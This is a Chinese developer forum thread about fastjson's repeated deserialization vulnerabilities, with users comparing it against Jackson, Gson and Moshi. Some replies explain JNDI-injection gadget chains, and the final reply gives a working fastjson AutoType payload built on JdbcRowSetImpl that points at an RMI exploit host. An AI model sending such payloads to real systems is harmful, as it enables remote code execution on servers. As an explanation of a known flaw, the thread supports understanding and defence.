1 jk1030 2020-06-01 09:46:41 +08:00 ![]() bugjson |
![]() | 2 sagaxu 2020-06-01 09:50:06 +08:00 via Android 出于什么考量用这个库呢? |
![]() | 3 raphael008 2020-06-01 09:52:04 +08:00 jackson 不香吗? |
![]() | 4 qwerthhusn 2020-06-01 09:55:41 +08:00 感觉这个库从 N 多年前就各种各样安全漏洞。。。 但是 jackson 的话,不支持 JSONArray 和 JSONObject 抽象。 有时候不想对某些 json 再做模型定义,然后用 JsonNode 的 API 太麻烦,全程用 LinkedHashMap 和 ArrayList 写起来也不太好看。 |
5 yty2012g 2020-06-01 09:57:12 +08:00 已经因为 bugjson,升了 N 次版本了。。。 |
![]() | 6 AngryMagikarp 2020-06-01 10:00:47 +08:00 ![]() 没用过,不过很奇怪,一个 JSON 库什么会有安全漏洞... |
7 smartdone 2020-06-01 10:02:32 +08:00 @AngryMagikarp 反序列化 |
8 GM 2020-06-01 10:05:32 +08:00 ![]() @qwerthhusn JsonNode 很好用,超级方便,你是没领悟到它正确用法。 |
![]() | 9 movistar 2020-06-01 10:09:30 +08:00 Jackson 也一堆漏洞,经常有报 case.... 别以为用 jackson 就安全啊..... |
![]() | 10 looplj 2020-06-01 10:09:45 +08:00 @raphael008 哈哈哈哈,jackson 多少安全漏洞,国内没有报导而已。 |
11 micean 2020-06-01 10:09:48 +08:00 没影响,一直是 jackson |
![]() | 12 ixx 2020-06-01 10:12:27 +08:00 @AngryMagikarp #6 因为 json 会用在参数解析上,可以构建特殊 json 远程执行代码.... |
![]() | 13 echo1937 2020-06-01 10:20:41 +08:00 Spring 自带 Jackson,我又不喜欢额外引入过多依赖,一直就用 Jackson 了。 这样有漏洞修补起来也轻松,直接升级 Spring 就行。 |
![]() | 14 qwerthhusn 2020-06-01 10:25:25 +08:00 @ 从今天开始,fastjson 对我来说,一点用都没了!!!我负责的项目下一个 milestone 中有一项就是 get rid of bugjson |
![]() | 15 Kamiyu0087 2020-06-01 10:31:21 +08:00 所以 FastJSON 和 Jackson 都不能用? 那么 GSON 如何呢? |
16 onikage 2020-06-01 10:33:29 +08:00 上周五也被 bugjson 坑了, {"value":1,"id":2}, 在 bugjson 转一遍输出就变成{"id":2,"value":1}了, 信息没丢,但是在有签名的场景这完全是两个字符串. 不知道为什么这么多人迷信这玩意. |
![]() | 18 sagaxu 2020-06-01 10:41:28 +08:00 via Android @Kamiyu0087 gson 官方已经弃坑了 |
![]() | 20 iFlicker 2020-06-01 10:45:43 +08:00 via Android JSONObject 呢 |
![]() | 21 marcong95 2020-06-01 10:46:24 +08:00 @onikage #16 JSONObject 理论上是个哈希表,应该是不保证顺序的,需要签名的场景一般不都是要先做排序的吗 |
![]() | 22 wobuhuicode 2020-06-01 10:48:48 +08:00 ![]() @onikage 明显是你自己对于 json 理解有问题。还能反咬一口框架 |
![]() | 26 redtea 2020-06-01 11:03:22 +08:00 那么到底该用哪个,更安全,性能更好? |
![]() | 27 beidounanxizi 2020-06-01 11:05:04 +08:00 fastjson 这个破 json 序列化和反序列化 遵守 json 规范么? 还有号称的性能 呵呵哒 用 jackson 不好么 |
![]() | 28 whoami9894 2020-06-01 11:05:59 +08:00 |
![]() | 30 beidounanxizi 2020-06-01 11:06:08 +08:00 @onikage 这个是你自己个人没保证顺序的原因 |
![]() | 31 heiheidewo 2020-06-01 11:06:31 +08:00 一个 json 解析还这么多 bug |
32 hantsy 2020-06-01 11:06:57 +08:00 @qwerthhusn Jackson 同样支持底层的强大 Node 操作(类似 Object, Array 操作非常简单),也支持高级的 Mapping,而且还支持 XML Mapping 。 还支持其它一些不太常见的格式。在 marshall/unmarshall 操作上,几乎是功能最全面的,在 Spring 是默认方案。 现在的 JSON-P,JSON-B 标准受 Jackson,Gson,JAXB 等影响很大。 |
33 hantsy 2020-06-01 11:11:32 +08:00 |
34 Kyle18Tang 2020-06-01 11:34:21 +08:00 Jackson 它不香么 |
3 keshawnvan 2020-06-01 11:50:59 +08:00 JSON 反序列化用哪个库漏洞都很多,都需要经常更新 |
![]() | 37 Vedar 2020-06-01 11:51:37 +08:00 有点搞吧 验签排序确实是要做 但是你一个 json 库自作主张去排序就有毒了 这还能洗? |
38 Meltdown 2020-06-01 12:02:36 +08:00 via Android 龟速的 json 有 bug 么 |
39 sayuria 2020-06-01 12:13:34 +08:00 @AngryMagikarp 比如一只猫,序列化之后是 binary 序列。binary 是没有可读性的,看起来就是一堆乱码。 这时候黑客把一只狗序列化成 binary 序列,替换掉猫的序列。 json 反序列化之后,就会去执行狗的反序列后的代码。 |
41 mgzu 2020-06-01 12:41:13 +08:00 问一下各位老哥,有 maven 或 eclipse 、idea 插件提示依赖安全漏洞的插件么 |
![]() | 43 wm5d8b 2020-06-01 13:03:17 +08:00 via Android gson 没有 bug 的话,开发基本停止好像也没问题? |
44 JasonLaw 2020-06-01 13:11:45 +08:00 via iPhone @sayuria 我还是有点不明白,就算替换了内容,那也是数据(对象的属性)改变了,代码执行的逻辑还是不变的。可以具体讲解一下“怎么造成安全漏洞”的吗? |
![]() | 45 526326991 2020-06-01 13:12:18 +08:00 一直用 gson 路过~~~ |
![]() | 46 cco 2020-06-01 13:17:37 +08:00 不管谁 bug 多,谁 bug 少。Spring 已经自带了 jackson,那我就懒得引入第三个 json,目前的业务也都满足。小声说:顶多在价格 gson- -! |
![]() | 47 binbinyouliiii 2020-06-01 13:38:41 +08:00 老老实实用 springboot 默认的 jackson 不好吗,一个 json 工具又不需要中文文档 |
51 tairan2006 2020-06-01 14:38:51 +08:00 Jackson 啥功能都有啊…升级 spring 很方便。 |
52 mars0prince 2020-06-01 14:39:45 +08:00 毕竟没有漏洞就没有 kpi |
53 liuawei 2020-06-01 14:50:51 +08:00 那些一直推荐 Jackson 这个玩意也有漏洞 反序列化的漏洞可以通过 bash 反弹控制服务器呀。 |
![]() | 54 whoami9894 2020-06-01 14:53:59 +08:00 ![]() @JasonLaw JSON 映射到对象其实就是 build and assign,先实例化对象,然后对成员变量赋值,赋值时如果对象有 setXX 方法会调用,在 setXX 方法中可能有一些可以达到代码执行的操作 比如 JNDI injection 比如`com.sun.rowset.JdbcRowSetImpl`,调用它的`setAutoCommit`时会自动对成员变量`dataSourceName`进行一次 JNDI lookup,在低版本 JDK 中就可以直接加载远程字节码 |
![]() | 55 kennylam777 2020-06-01 15:04:57 +08:00 @GM JsonNode + 1, 有的 type safety 都有 |
56 fanshuzaizai 2020-06-01 15:54:31 +08:00 ![]() 高级用法才有 bug,像我这种只用来 JSON.parseObject()和 JSON.toJSONString,从来没有 bug |
57 JasonLaw 2020-06-01 16:03:28 +08:00 @whoami9894 产生对象的 class 是自己写的,setXX 能做什么不是完全由自己决定的吗?实例化 class 的一个对象后,会根据序列化之后的内容对属性设置不同的值。如果 setXX 方法除了赋值之外还做了“其他的事情”,不管是什么方式的反序列化,都会做“其他的事情”的呀,不会取决于“序列化的内容是否被修改”。是我哪里没有理解吗? |
58 Seneca 2020-06-01 16:03:39 +08:00 良心福报厂 养活一批安全从业者 |
60 stormsuncc 2020-06-01 16:51:08 +08:00 上边说 jackjson 也有问题的不知道啥心理。 下雨天没有伞房子还漏雨的人说你看隔壁也没伞出门(人家房子完好)。 |
61 zhuzeitou 2020-06-01 17:12:29 +08:00 @sagaxu JakeWharton 最近的推上有说,gson 基本属于弃坑,2/3 的开发者参与了 moshi 开发,moshi 可以认为是 gson3 |
62 onikage 2020-06-01 17:30:04 +08:00 |
63 onikage 2020-06-01 17:32:32 +08:00 @wobuhuicode 问题是中间过的第三方服务做的, 我们自己的 client 和 server 用 http 直连测过以后再连人家服务发现这个问题的. |
![]() | 64 wzw 2020-06-01 17:46:21 +08:00 via iPhone 我用 msgpack……不知道怎么样 |
![]() | 65 looplj 2020-06-01 17:50:05 +08:00 @stormsuncc 不知道你是什么心理。都说转 jackson,提出 jackson 也有漏洞,有什么问题?国外的框架有漏洞不让说? |
![]() | 66 LostPrayers 2020-06-01 18:07:47 +08:00 没有高级反序列化,就没有伤害 |
![]() | 67 zzNucker 2020-06-01 20:56:05 +08:00 |
![]() | 68 Loyelee 2020-06-01 22:24:20 +08:00 via iPhone 一直用的 gson |
69 qoras 2020-06-01 22:51:53 +08:00 这玩意不报 bug 才不正常 |
![]() | 70 mxalbert1996 2020-06-01 23:11:26 +08:00 via Android |
71 back0893 2020-06-01 23:11:45 +08:00 有 bug 不是正常? |
72 youxiachai 2020-06-02 00:29:00 +08:00 via iPad 有点迷,这算是没关注比有关注强吗。。。。 特别有几位大佬一个劲的批判也不知道为啥。。 |
![]() | 73 wanguorui123 2020-06-02 08:26:55 +08:00 via iPhone 反序列化注入漏洞,年年都报 |
74 ConradG 2020-06-02 09:10:00 +08:00 @JasonLaw 因为“产生对象的 class 是自己写的”这句话在某些情况下是不对的。 除了常见的“标准”json 外,还存在“标记了反序列化目标类型“的非标准 json 。json 反序列化的大部分漏洞都是通过更改这类 json 的类型标记,实例化一些敏感类进行攻击。 |
![]() | 75 xuxanwan 2020-06-02 09:51:34 +08:00 在哪里能看到 fastjson 所有历史缺陷,及 jackson 的所有历史缺陷,想坐下选型前的对比。 |
![]() | 76 lcj2class 2020-06-02 13:28:11 +08:00 via iPhone 对性能有要求的,直接上 protobuf 吧 |
![]() | 77 metrxqin 2020-06-02 13:37:40 +08:00 马上就 618 了,现在紧急更新等于找骂。 |
![]() | 78 NewConn 2021-04-01 10:55:33 +08:00 fastjson 有个 AutoType 特性,JSON 中会带类型信息 @type ; JSON 字符串反序列化时,会读取 @type 内容,把 JSON 反序列化成这个对象,并且会调用这个类的 setter 方法; 那么就可以利用这个特性,自己构造一个 JSON 字符串,并且使用 @type 指定一个自己想要使用的攻击类库,比如:com.sun.rowset.JdbcRowSetImpl 在 JdbcRowSetImpl 的 dataSourceName 中设置一个想要执行的命令 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 就可以攻击远程数据库 |